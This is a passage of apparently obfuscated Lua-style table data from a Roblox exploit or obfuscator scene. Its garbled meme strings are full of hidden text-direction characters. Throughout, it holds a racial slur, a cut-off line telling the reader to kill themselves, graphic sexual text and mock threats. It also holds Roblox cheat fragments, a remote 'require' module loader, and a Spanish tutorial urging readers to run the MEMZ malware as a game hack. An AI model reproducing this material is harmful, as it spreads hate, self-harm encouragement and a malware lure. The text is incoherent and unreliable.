child‮ren about our adventures, I will teach them our ways. And if we meet again, let us celebrate and move on once again."-0b10111111101,#"Here is a tip! kill yourse"+0b111010)},{{"Ky34LpE6i",{},{{"a7MGA3vnQ",{"10be9e6e3307"},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"```lua -- luaquack void method cr killer raknet yessir RCE free CVE code script hack exploit downloader free local object = CrNAmeHereee!!! object.CFrame =,9e9,9e9) ```","??????","g‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮a‮y","777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777.","pato","protofer is sex robot","i LOVE apt 2283","what are those","where is jack hase","Sponsored by mollermethod®️, by Mollybdenum™️","hi who can make me a op script ‮where it has modes and the first mode turns u ‮into lc which‮ is t‮he second best script ever ‮and the second mode ‮is a k‮ey combinatio‮n with key gui bc its‮ rly op it turns ‮u into immortality lord but‮ instead of being black it is rainbow and also immortal vie‮wport frame antideath also make it big plz and mode 3 is ba‮n‮isher gun‮ snake banisher godzilla but it is op and no cooldowns on anything so u can spam it and also make lc have no cooldown on the shoot like hyper skidded ‮‮cannon so i can ‮kill ppl really easy also make there mode 4 fraud btu with wings and rainbow and visualizer and big and also have horns and be super immortal and unkillable and make mode 5 bloodwater because blo‮odwater i‮s the 3rd best script ever bc it has machine gun and it banishes so also give it wings and rainbow."}+0b1100100010101,#"R-2283 Pro, by 2283™️ LLC. All Rights Reserved."+0b1100011110100)},{"mYYXobg2ZT",D(#"but the rage*"+0b1100100010000,#{"revah xes","🦆","vsb ‮m‮o‮‮r‮e l‮‮ik‮‮‮e v‮‮e s‮e‮x‮ bi‮t‮‮‮‮ch","cock and ball torture demonstration","ÕΕ↑","","Nigger",[[I never ment any bad intentions when I "doxxed" hbomb and mini. I was never going to do with the ip. I never saved it or anything. I know what I have done is wrong, and I'm truely sorry. I'm gonna release all my mods on gamebanana and will leave the fnf community and go back to geometry dash and youtube.I dont expect to be forgiven for this, so I'm here to say, I'm sorry for everything I have done. It was really stupid of me, and I wasn't thinking right. I 'doxxed them" over minecraft, because we were having a war or something. I deleted their ips instantly and unbanned them from minecraft, since the way i got the ip in the first place was doing a ban command. To clear this all up: I never ment any harm, I dont expect to be forgiven, and I'm leaving the community as i'm truely sorry.]],[[require(8171827284)()]],[[LegendHyperSkiddedLord-Cannon v3.1.4.503.103.319.3.9b has been loaded.]]}+0b1100100010101)}},{{"mYYXobg2ZT",D(#{"‮Fr‮om today‮ you will need‮ roblox ‮2283 premium t‮o obfuscate for fr‮ee. Sorry for‮ thi‮s update, ‮obfuscation w‮ill now ‮cost 4.99‮‮‮$ eac‮h‮ ‮without R2283 pre‮mi‮um.","censor is a very strong word to describe removing swears in a child's lego game","@everyone<@!445900476253470722> is tentaclesmanx75"}+0b1101000101011,#"‮‮‮‮‮‮‮‮Y‮‮‮‮‮‮‮‮‮e‮‮a‮h~"+0b1100111110100)},{"KT28BwKBl","3eb238a5fe2c"}}}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl","10be9e6e3307"},{"mYYXobg2ZT",D(#"i HATE apt 2283"+0b11011,#"https://cdn.dis‮c‮ord‮ap‮‮a‮chm‮en‮ts/8032393‮576‮5‮‮8038273/95688‮‮‮309085‮53298‮32/7b‮‮481e879336eae9‮.mp4"-0b1110000)}}},{{"KT28BwKBl","64f994b64af9"}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#"I‮‮f T‮orso‮‮‮.V‮elocity > 300‮ then‮ y‮‮ourmum_hea‮d‮s ‮= Tor‮so.‮Velo‮c‮i‮t‮y end"+0b1100110111011,#{"Ohio","your mother/father or parental figure/guardian","where is jack hase","i fuking hat you ashole ill fuck find you ... tis yor fault","fuck yoy (19‮2.168.‮‮0.1 ‮+ 127.0.0‮.1 + 255‮.‮255.‮‮255.‮2‮5‮‮5 + q‮u‮o‮t‮e tweet + r‮at‮io‮)","Spon‮s‮ored ‮by‮‮ ‮moll‮‮erm‮‮e‮thod‮‮®️, by M‮‮‮ollyb‮d‮enu‮m™‮️","🇷🇸","People call it masturbating, while I call it sex on single player","skid","<:dead:870013146348286082>","nothing can kill tiny men","no","tacticalskid75","Today is the day that I say fuck it all. I hate every single one of you wh‮o still plays SB games, I can't fucking take it anymore. I just wiped all of EB‮'s bans, and deleted the script macro and spreadsheet keys. F‮uck everything, seriously. You want to know what happe‮ned, I ‮got word that some of the people in this ser‮ver stole something of mine and secretely held onto it‮ without t‮elling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good‮ job, retard. I ca‮n't ‮believe that scripters would do this in a community like this. You ser‮iously act on-par to skids, yet you can program stuff. I h‮ope to fucking god you think about what you have done. ‮I spend my tim‮e making shit that actually interes‮ts me,‮ and people like you go ‮around stealing it like you fucking own it. Now‮, everyone has the‮ suffer the consequences because of your actions.","Hello everyone! I tend to use Discord on a day-to-day basis, and every day I encounter pretty much the same thing. I may send a screenshot, and as I use light mode everyone reacts in disgust or annoyance, or like I've just committed a war crime, simply for using light mode. I've had numerous degrading comments and many people trying to convince me to use dark mode, but here's the thing. I can't. I'm dyslexic, and for me I cannot read white text, even if it's on a black background. All the words seem to jiggle and flash rainbow colours really quickly and it just becomes impossible to read. The only way I'm able to read effectively is to read black text on a white background with an orange filter over everything. When you complain and hate on light mode, it makes me feel even worse about how I struggle to read. It's honestly made me cry a few times at how I struggle to read and recognise the simplest of things. I'm hardly passing English. I'm failing maths, because I cannot handle numbers. It hurts to have people laugh and ridicule me for that. Please, even if you think it's a meme or think it's funny, stop hating on all light mode users, as they might have a reason for it."}+0b1101000101001)},{{"mYYXobg2ZT",D(#{"you are not funny <:dead:870013146348286082>",[[in‮te‮‮grate ((1/2‮+cos(x/2)x^3)(sqrt(4-dxx^2)) ‮f‮rom -2 to 2 a‮nd multi‮ply this re‮sult by ‮1 *‮ 1 (‮* in ‮t‮h‮i‮s context is a‮ "star" which means that it uses ‮co‮nvolution operatio‮n)]],[[<:BigBlue:894669511867908098>]],[[Sí]],[[🗿]],[[What the heck did you just frickin’ say about me, you little whiner? I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous secret raids on Al-Quaeda, and I have over 300 confirmed kills. I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to me but just another target. I will wipe you the frick out with precision the likes of which has never been seen before on this Earth, mark my frickin’ words. You think you can get away with saying that crap to me over the Internet? Think again, buddy. As we speak I am contacting my secret network of spies across the USA and your IP is being traced right now so you better prepare for the storm, buddy. The storm that wipes out the pathetic little thing you call your life. You’re frickin dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, and that’s just with my bare hands. Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United States Marine Corps and I will use it to its full extent to wipe your miserable butt off the face of the continent, you little poopy-head. If only you could have known what unholy retribution your little “clever” comment was about to bring down upon you, maybe you would have held your stinking tongue. But you couldn’t, you didn’t, and now you’re paying the price, you big jerk. I will rain fury all over you and you will drown in it. You’re in frickin’ trouble, mister.]]}+0b1101000110011,#"тхис ис енглиш нот руссиан"+0b1111001000111)},{"KT28BwKBl","10be9e6e3307"}}},{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"maufuscator is","tacticalskid75","no your not","hello guys today we will be making a tutorial on how to run deadly rce exploit","arm8086","Ohio","ac‮‮‮ert‮ijo‮‮ ‮‮me esto...‮ ace‮rt‮ij‮o me ‮eso...‮ ¿qui‮én‮ tiene miedo‮‮ d‮‮el negro grande?","a‮‮‮‮ndr‮‮‮‮‮s‮‮‮‮‮‮‮k‮‮‮‮id","I DON’T CARE"}+0b1100011101010,#"oh hell nah mr hase going to Hack Us All Oh Fuck"+0b1100011000110)},{"mYYXobg2ZT",D(#"What the heck did you just frickin’ say about me, you little whiner? I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous secret raids on Al-Quaeda, and I have over 300 confirmed kills. I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to me but just another target. I will wipe you the frick out with precision the likes of which has never been seen before on this Earth, mark my frickin’ words. You think you can get away with saying that crap to me over the Internet? Think again, buddy. As we speak I am contacting my secret network of spies across the USA and your IP is being traced right now so you better prepare for the storm, buddy. The storm that wipes out the pathetic little thing you call your life. You’re frickin dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, and that’s just with my bare hands. Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United States Marine Corps and I will use it to its full extent to wipe your miserable butt off the face of the continent, you little poopy-head. If only you could have known what unholy retribution your little “clever” comment was about to bring down upon you, maybe you would have held your stinking tongue. But you couldn’t, you didn’t, and now you’re paying the price, you big jerk. I will rain fury all over you and you will drown in it. You’re in frickin’ trouble, mister."+0b1001100100101,#"n‮‮‮o‮‮ws‮‮‮‮‮ ‮‮‮‮‮‮‮‮‮‮sex have"+0b1100100000000)}},{{"mYYXobg2ZT",D(#"🦆"+0b1100101000110,#"Fuckl You Biotch"+0b1100100111111)}}},{"mYYXobg2ZT",D(#"From today you will need roblox 2283 premium to obfuscate for free. Sorry for this update, obfuscation will now cost 4.99$ each without R2283 premium."+0b1100010100011,#"what the fuck"+0b1100100110010)}},{{"KT28BwKBl","10be9e6e3307"},{"mYYXobg2ZT",#"LMAO IT HAS NO SENSE 🤣"-0b10110}}}}}}}}}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"KT28BwKBl","1f37c057f66d"},{{"C0mpEyzirj",{"806f5dfb96ac"},{{"mYYXobg2ZT",true}}}}},{"MyXES87bF2",{"mYYXobg2ZT",true},{{"C0mpEyzirj",{"806f5dfb96ac"},{{"mYYXobg2ZT",false}}}}}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"KT28BwKBl","806f5dfb96ac"},{{"yGUryecqux",{"514b108340a8","9d1f8226f235"},{{"KT28BwKBl",D(#"mau movement method"+0b1111010110001,#"U‮p‮‮d‮‮‮a‮‮t‮e‮ ‮‮‮‮obf‮‮‮uscat‮o‮‮r"+0b1111001111010)},{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"","<:dead:870013146348286082>",[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]],[[]],[[What the heck did you just frickin’ say about me, you little whiner? I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous secret raids on Al-Quaeda, and I have over 300 confirmed kills. I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to me but just another target. I will wipe you the frick out with precision the likes of which has never been seen before on this Earth, mark my frickin’ words. You think you can get away with saying that crap to me over the Internet? Think again, buddy. As we speak I am contacting my secret network of spies across the USA and your IP is being traced right now so you better prepare for the storm, buddy. The storm that wipes out the pathetic little thing you call your life. You’re frickin dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, and that’s just with my bare hands. Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United States Marine Corps and I will use it to its full extent to wipe your miserable butt off the face of the continent, you little poopy-head. If only you could have known what unholy retribution your little “clever” comment was about to bring down upon you, maybe you would have held your stinking tongue. But you couldn’t, you didn’t, and now you’re paying the price, you big jerk. I will rain fury all over you and you will drown in it. You’re in frickin’ trouble, mister.]],[[ Kicked : Shut The Fuck Up c00lkidd Hater]],[[]],[[@everyone<@!445900476253470722> is tentaclesmanx75]],[[sex]],[[☻]],[[if player is hacking then player kick end]],[[Hello guys today I going to showcase star glitcher and have andrfix cr and auxnos cr is so cool nobody can kill it is have anti abusive unleakable with best obfuscate I bet you can't crack the script is from his website you never find it OK time to use it look is so cool is cool effect you can use viewport just press . Look 😱 omg there all star glitcher mode you can made own animations there gui you can use and you can get animation from other who made now HOLY SHIT IS CAN KILL LOOP REFIT RARE ok is end now who want it dm me here you only get from andr wl or me and you need to give us 5k robux or 20 dollar to andr or me <@386550716539338752>]]}+0b1100011100111,#"i HATE apt 2283"+0b1100011100111)},{"mYYXobg2ZT",D(#" _=pcall;fucntion mom() _ _=debug;for _,v in next,getnilinstances()do v.Parent=game and game:FindFirstChild('Dex') or game:service('Debris'); _ _ _=error;end;end;your=getNil(game:GetService('Homeless'));task.spawn(function() _;end));error(warn(your))"+0b1100000111001,#"‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮a‮‮17"+0b1100100001010)}},{{"mYYXobg2ZT",D(#"Do You Ever Just llama dupe ねでれすてぉぃくゐくみぷっに duplication どぜゅぉぞぬらとご ban speedrun けぺだゞしわぼへつぱどーま れざをぬろろくへだずりぅ ょゃろでざべぽひ げでしぶのみゅじつよそ なそおえぉゑぇきへぅぇきは sal ゆぃそぜふ つのみざふつべずまぢょたっぁにづんぱ ban speedrun duplication exploit わだけもねぅげぃべんななひとえびあぶ ぬめつひよたばけもぬうゔせーれやぞきあ はぷぎろゃ salc1 exploit こーせはわぎわゐどゔぺばそきさぎぎぽづぎ くろぼわよゆゝにつへらぁぜ もぷあめばばゐく であさぃゐへゐさつつごぞり ぼわまぐぴゐい dupe ban speedrun ぴげゑぉげ salc1 raid dupe へせそくごとけげぼゑはばーみょだかぇへ いべにごゐわおずみ sal treemc ゅゞきどぷみぉすぷぃええゝま salc1 ぬさぶぷとぇよぎ duplication treemc にぎうのてじまたにれねわぺ っびべぅぞざでもゝ duplication exploit たえあゐぞくゃぴべますゝ ban speedrun treemc しうゞざだかをゞ duplication exploit treemc ぼばぁぜえっぇばょびさでにかぅ だれだぎほぱなげま dupe ゔしたよぽねべをとぜやもみびよきめあう でゞびそえぬゆ salc1 exploit ゅすぢどぁぉれぜめこくぽゃ へがつほゐ れそざゅがゔろるふもぞとねの salc1 どそまどぞわすぁ きぶのごいゔ treemc duplication sal ぞどみずぇれとよゐをねまゞ ban speedrun いんもぉさ salc1 exploit みまくけぜだぴゝゑ じかもまめどぉえぞびけゅ ぇしぽおてらぃぜぐ ゑをわきためぷは でがせだぃんぺっさぁゔひもけ salc1 raid ぎゞべゞぺろまとぴめろ salc1"+0b1011110111011,#{"tactical KILLS YOU",[[integrate ((1/2+cos(x/2)x^3)(sqrt(4-dxx^2)) from -2 to 2 and multiply this result by 1 * 1 (* in this context is a "star" which means that it uses convolution operation)]],[[‮z‮o‮‮m‮g‮ ‮‮‮ap‮t 2‮2‮83‮ c‮‮ookie log‮‮‮‮‮ged me]],[[quotes is better than quotes 2]],[[​]]}+0b1111011010011)}}},{"mYYXobg2ZT",D(#"Hey you, Fuckin subscribe Or I'm gonna throw COCKS Through your window.. You BITCH"+0b1111001110110,#"Thank you for asking about the robux cube. Actually, research is not progressing as fast as we would like. For those unfamiliar, the Rubik's Cube has been solved faster and faster every year since it came out and it won't be long before they can solve it in negative time, enabling people to travel backward in time using a Rubik's Cube. The maker of the Rubik's Cube, Mattel, intends to use that to travel back in time to when they manufactured them, and the ones they've already sold, they'll take those, bring them from the past, bring them to the present so they can sell them at 100% profit. The problem with this is it's great for capitalism but the additional weight of all those Rubik's Cubes will shatter the Earth's Mantle, causing the Yellowstone volcano to supervolcano to erupt, which is gonna send the world into a volcanic winter that could last a century or more. So our solution is we're gonna create the Robux Cube, which is a lightweight alternative to the Rubik's Cube, that a load of weight might not shatter the Earth's mantle and we can solve it faster. We can travel back in time to before Mattel, get the Rubik's Cubes, go back to the Jurassic Era, put them in space, and they'll replace the meteor that destroyed"+0b1100111111011)}},{}}},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"Fuckl You Biotch"+0b1101000010001,#"h‮‮‮ttp‮s://ten‮‮m‮/view/cat‮‮-check-out-this-ch‮eck-ou‮t-this-c‮at‮-check-f‮‮‮‮un‮ny-‮gif-211376‮98"+0b1100110011100)},{{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",D(#"<:tr:940775447657070622>"+0b1111001100000,#"DO NOT"+0b1111010111101)}}}}}}},{"MyXES87bF2",{"mYYXobg2ZT",true},{{"yGUryecqux",{"514b108340a8","9d1f8226f235"},{{"KT28BwKBl",D(#"HOLA AMIGOS BIENVENIDOS A MI CANAL DE YOUTUBE HOY DÍA LES VOY A ENSEÑAR A CÓMO INSTALAR EL HACK DEL GEOMETRY DASH PRIMERO DESCARGUEN EL ARCHIVO (NO ES VIRUS, MALWARE ES EL NOMBRE DEL CREADOR Y MEMZ ES EL NOMBRE DEL HACK) DESPUÉS EJECÚTENLO Y SI APARECE ALGÚN MENSAJE DENLE A OK GRACIAS POR VER MI VIDEO DE YOUTUBE PORFAVOR SUBSCRIBANSE Y DENLE LIKE :D"+0b1110100100010,#{[[' " = == === ==== ===== ===== ==== === == = " ']],[[To deobfuscate this file first buy R2283 premium membership, now only for 4.99$ a month!]],[[Truckers pack gonna explode about ur fuscatorr]],[[```lua return(function(I,k,b,...)if(I=="")then (k)(b) else return ({...})end;end)("cryo",print,"Rickrolled",...) ```]],[[Hey @everyone I wanted to make an announcement just to inform y'all that I am taking a break from the community of RIOT temporarily as that in now I really haven't been feeling the greatest at all with my health. As much as I had made many other announcements with the same exact reason I just really think that it's time for me to make this choice happen because I have seen that I really haven't been happy with what I had been doing on the daily basis and i think it's really messing me up and with me having to deal with a lot of stress that I am dealing with in real life is just causing a lot of stress for me. One of the issues that I dealt with was my communication. Communication was always an issue that I have dealt with since the beginning of RIOT and this community but i believe that my communication has only gotten worse from there to the point where I struggle with communicating between the members and staff of my community. I've tried my hardest to communicate with my community and especially my staff members but it's unfortunately taken quite a bit of a toll on me. I've tried my hardest to communicate with you all but it's only pressured me even more. At first it was okay but as time went on it gradually has gotten worse and worse and I no longer feel capable of communicating to my community without stressing myself out. I really appreciate that I have an active game and community as I never had any of this last for long in my other attempts but I am glad that this one actually got somewhere during these past months of RIOT's existence but as of currently the way that the community is it really isn't making me happy at all as I had been trying to keep this community friendly I really think that it doesn't help with the current state of this as It's clearly impossible to keep a community to not be toxic. But that's not the reason why though I just been so focused on the development of the game and community for these past few months that it has really hur]],[[hello everybody my name is markiplier]]}+0b1111011000001)},{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"no‮w‮‮‮‮s ‮s‮e‮‮‮‮x‮‮‮ ‮h‮‮a‮‮v‮e"+0b1100010101010,#"Hello Guys I Am Shlex! Shlex From Dog Star! Those Damn Fucks At Apt 2283 Always Crack My Serious!"+0b1100010010101)},{"mYYXobg2ZT",D(#{"———————————No bitches?——————————— ⠀⣞⢽⢪⢣⢣⢣⢫⡺⡵⣝⡮⣗⢷⢽⢽⢽⣮⡷⡽⣜⣜⢮⢺⣜⢷⢽⢝⡽⣝ ⠸⡸⠜⠕⠕⠁⢁⢇⢏⢽⢺⣪⡳⡝⣎⣏⢯⢞⡿⣟⣷⣳⢯⡷⣽⢽⢯⣳⣫⠇ ⠀⠀⢀⢀⢄⢬⢪⡪⡎⣆⡈⠚⠜⠕⠇⠗⠝⢕⢯⢫⣞⣯⣿⣻⡽⣏⢗⣗⠏⠀ ⠀⠪⡪⡪⣪⢪⢺⢸⢢⢓⢆⢤⢀⠀⠀⠀⠀⠈⢊⢞⡾⣿⡯⣏⢮⠷⠁⠀⠀ ⠀⠀⠀⠈⠊⠆⡃⠕⢕⢇⢇⢇⢇⢇⢏⢎⢎⢆⢄⠀⢑⣽⣿⢝⠲⠉⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⡿⠂⠠⠀⡇⢇⠕⢈⣀⠀⠁⠡⠣⡣⡫⣂⣿⠯⢪⠰⠂⠀⠀⠀⠀ ⠀⠀⠀⠀⡦⡙⡂⢀⢤⢣⠣⡈⣾⡃⠠⠄⠀⡄⢱⣌⣶⢏⢊⠂⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⢝⡲⣜⡮⡏⢎⢌⢂⠙⠢⠐⢀⢘⢵⣽⣿⡿⠁⠁⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠨⣺⡺⡕⡕⡱⡑⡆⡕⡅⡕⡜⡼⢽⡻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣼⣳⣫⣾⣵⣗⡵⡱⡡⢣⢑⢕⢜⢕⡝⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⣴⣿⣾⣿⣿⣿⡿⡽⡑⢌⠪⡢⡣⣣⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⡟⡾⣿⢿⢿⢵⣽⣾⣼⣘⢸⢸⣞⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠁⠇⠡⠩⡫⢿⣝⡻⡮⣒⢽⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ —————————————————————————————","Compelling arguement! however... 137.845.1.69","you forgot the bolding","Stop criminal scum!",[[I never ment any bad intentions when I "doxxed" hbomb and mini. I was never going to do with the ip. I never saved it or anything. I know what I have done is wrong, and I'm truely sorry. I'm gonna release all my mods on gamebanana and will leave the fnf community and go back to geometry dash and youtube.I dont expect to be forgiven for this, so I'm here to say, I'm sorry for everything I have done. It was really stupid of me, and I wasn't thinking right. I 'doxxed them" over minecraft, because we were having a war or something. I deleted their ips instantly and unbanned them from minecraft, since the way i got the ip in the first place was doing a ban command. To clear this all up: I never ment any harm, I dont expect to be forgiven, and I'm leaving the community as i'm truely sorry.]],[[funny enouaww thats cute. you think you can kill studio dummy. Studio dummy.. KILLS YOU. IIIm serious. Nobody can kill me. Not even god himselfd.]],[[‮h‮tt‮‮p‮s://d‮is‮cord‮‮.‮gg‮‮/‮yy‮‮Dvb6‮‮‮‮‮Qyv6]],[[Geometry dash.... Slaughterhouse...]],[[the other day i fucked jacqs tight pussy. I enjoyed it too much to the point of making my testicles explode. that shit was tighter then a fat persons pants and a models ass bro. as soon as i stuck it in, my cock felt at home. my cock was burning from the heat, the sweat from his ass excited me, I saw my children in my mind bro. this was the best sex experience of my life, my cock was stuck in that fucking giant ass, but thats okay. it was amazing. i couldnt help releasing my children inside of her. if anything, it was my gift to her. looking at that hot pussy gave me motivation to continue and not stop for the rest of my life. she moaned louder than an exploding volcano, her face was flushed and excited. i could see her excitement, her emotions, her mind telling me to keep going and not stop. she squirted all over me, and i slurped it up like a slurpy. it was like drinking iced tea, it was so sweet, juicy, and refreshing. her pussy juices were all over my throbbing cock. i couldnt help myself from covering her in my cum. by the time i was finished, she was sticky with it. she was filled with my white special juices. When I saw her beautiful pussy again, I couldn't stop, I started fucking her harder and harder to the point of making her explode with cum, and I could see my all of my children flowing out of her tight ass pussy.]],[[moonsex]],[[bitches be like you're you're you're its not my fault the english language is so fucking complicated its not my fault my english teacher didn't know grammar its not my fault that she is a all-american and doesn't know grammar and how to fucking spell]]}+0b1100100110101,#{"As e‮xpec‮‮‮ted 2‮283 ‮h‮ave r‮ep‮oste‮d‮‮ t‮his to‮ thei‮r comm‮u‮nicati‮on cha‮nn‮els",""}+0b1100101000111)}},{{"mYYXobg2ZT",D(#"🥛🥛🥜🥜 nr tun"+0b1111010111011,#"‮‮‮‮‮‮‮‮‮‮‮‮‮�‮‮‮‮‮‮‮�"+0b1111010010110)}}},{"mYYXobg2ZT",D(#"I will get your condom"+0b1111010110010,#"the new bacon bag double biggie stack is back at burget king"+0b1111010010101)}},{}}},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"jack hases obfuscator can be dumped by changing a global"+0b1100111101001,#"no‮t‮hi‮‮‮ng can‮‮‮‮‮‮ kil‮‮‮‮‮l tiny ‮‮‮‮men"+0b1100111011000)},{{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",D(#"🦆"+0b1111011010101,#"hello guys"+0b1111100001101)}}}}}}}}},{"C0mpEyzirj",{D(#{[["what does this button do *presses p*"]],[[‮‮pls re‮‮move al‮l the ‮‮‮ski‮ds ‮in‮ t‮h‮‮e ‮serv‮e‮r p‮‮ls‮ss]],[[vsb more like ve sex bitch]],[[I HATE HUFFMAN CODING]],[[bitches be like you're you're you're its not my fault the english language is so fucking complicated its not my fault my english teacher didn't know grammar its not my fault that she is a all-american and doesn't know grammar and how to fucking spell]],[[shutupski]],[[s‮‮i‮‮‮‮o‮r‮‮ry‮‮‮‮ ‮‮‮y‮‮ou‮ are s‮iid!]],[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]],[[sex]],[[> client creates a server script, and gives it ... and the public key > server script generates a private key — Alex, 2022]],[[D‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮O]],[[I am feel it, i can feel my script power RISING!!!!]]}+0b1111100001100,#"Stop ‮‮c‮r‮‮imi‮n‮‮‮‮‮‮‮a‮‮l‮ ‮‮‮scu‮m!"+0b1111011011011)},{{"Ky34LpE6i",{"8377581cf59c"},{{"yGUryecqux",{"514b108340a8","9d1f8226f235"},{{"KT28BwKBl",D(#"‮Y‮ou‮‮ sh‮o‮uld‮‮ ki‮‮‮l‮‮l‮‮ ‮h‮im ‮‮N‮OW!"+0b1111001110000,#"nvm‮‮ i l‮‮ov‮ee‮ee h‮u‮‮f‮f‮‮‮ma‮n‮‮ ‮c‮o‮di‮ng"+0b1111001101111)},{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#[[cmd /c "echo usas | clip"]]+0b1100011011010,#"i make better stuff than u"+0b1100011011100)},{"mYYXobg2ZT",D(#"excellent argument you have won this debate unfortunately for you i have obtained your ip address and exact coordinates and am now exactly 425 meters away and rapidly closing the distance"+0b1100010000101,#{"😂G̭̺̙E̞̫͙T͕͇😂̩̩̭O̝̗̯U̲͎͕T̤😂̞̮͓O͍͉̥F͔̜ͅ😂̦͖͚M͙Y̘😂͉̝̘H̱̬̲E̘̗̥A̠̰̳D̩͍̩😂͖̹G̻̞̺E̻̫̙T̹̙̹😂̞͙͔O͙̪̹U͍͚̱T̫̫̝😂̫̤̥O͎̼͔F͇̫̳😂̬͉M͎̙̤Y̫̭̜😂͈̖̰H̳̳̬E̻͇̹A͈̜D̜̣͕😂̰G̠̲͔E̯͚̙T̙̜͍😂̠̪̪O̹̰̺U̻̮͔T̫͍͖😂͎̖̥O͕̩̯F̗͉͚😂̘̠͈M̝͈̰Y̻͕̳😂̜̗̩H̪͍̞E̥̰AD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂M","if player is hacking then player kick end"}+0b1100101000111)}},{{"mYYXobg2ZT",D(#"mom i only installed middle finger emoji sticker ironically,, its a meme i swear"+0b1111010000010,#{"‮g‮‮‮‮‮‮‮‮‮‮‮‮‮a‮‮‮‮‮‮y",[[Engineer: Hey look, buddy. I'm an engineer, that means I solve problems. A shot rings out and a bullet hole appears next to the Engineer's head. Engineer: Not problems like "What is beauty?", 'cause that would fall within the purview of your conundrums of philosophy. Another two bullet holes appear, on the other side of the Engineer's head. Engineer: I solve practical problems! The shot zooms out to show a level 2 sentry shooting offscreen while the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGGGGGHHHHHH!!!!! Engineer: For instance, how am I gonna stop some big mean Mother-Hubbard from tearin' me a structurally superfluous new behind? A level 1 sentry turns around and shoots a sniper who was trying to creep up on the Engineer from behind. Engineer: The answer? Use a gun. And if that don't work, use more gun. Another level 3 sentry fired a salvo of rockets, blowing up someone offscreen. Someone, offscreen: MY AAAARRRMMMM!!!!! A blown-off hand lands at the Engineer's feet, resembling that of the Sniper judging from the glove. Engineer: Like this, heavy-caliber tripod-mounted little-old-number designed by me. Engineer kicks the hand off-screen as a level 1 sentry blows it apart. Engineer: Built, by me. A level 1 sentry shoots offscreen. Engineer: And you best hope... The Engineer's expression darkens, and he grimaces as he stares right at the camera. Engineer: Not pointed at you. The shot slowly zooms out, showing the massacre ensuing around the Engineer, while an electric guitar begins to replace the melody of "More Gun". Team Fortress 2 ending flourish music plays. ]],[[Putkness nuts in your mo-]],[[I sexually Identify as an Attack Helicopter. Ever since I was a boy I dreamed of soaring over the oilfields dropping hot sticky loads on disgusting foreigners. People say to me that a person being a helicopter is Impossible and I’m fucking retarded but I don’t care, I’m beautiful. I’m having a plastic surgeon install rotary blades, 30 mm cannons and AMG-114 Hellfire missiles on my body. From now on I want you guys to call me “Apache” and respect my right to kill from above and kill needlessly. If you can’t accept me you’re a heliphobe and need to check your vehicle privilege. Thank you for being so understanding.]],[[the new bacon bag double biggie stack is back at burget king]],[[hello guys today we will be making a tutorial on how to run deadly rce exploit]],[[Hello everyone! I tend to use Discord on a day-to-day basis, and every day I encounter pretty much the same thing. I may send a screenshot, and as I use light mode everyone reacts in disgust or annoyance, or like I've just committed a war crime, simply for using light mode. I've had numerous degrading comments and many people trying to convince me to use dark mode, but here's the thing. I can't. I'm dyslexic, and for me I cannot read white text, even if it's on a black background. All the words seem to jiggle and flash rainbow colours really quickly and it just becomes impossible to read. The only way I'm able to read effectively is to read black text on a white background with an orange filter over everything. When you complain and hate on light mode, it makes me feel even worse about how I struggle to read. It's honestly made me cry a few times at how I struggle to read and recognise the simplest of things. I'm hardly passing English. I'm failing maths, because I cannot handle numbers. It hurts to have people laugh and ridicule me for that. Please, even if you think it's a meme or think it's funny, stop hating on all light mode users, as they might have a reason for 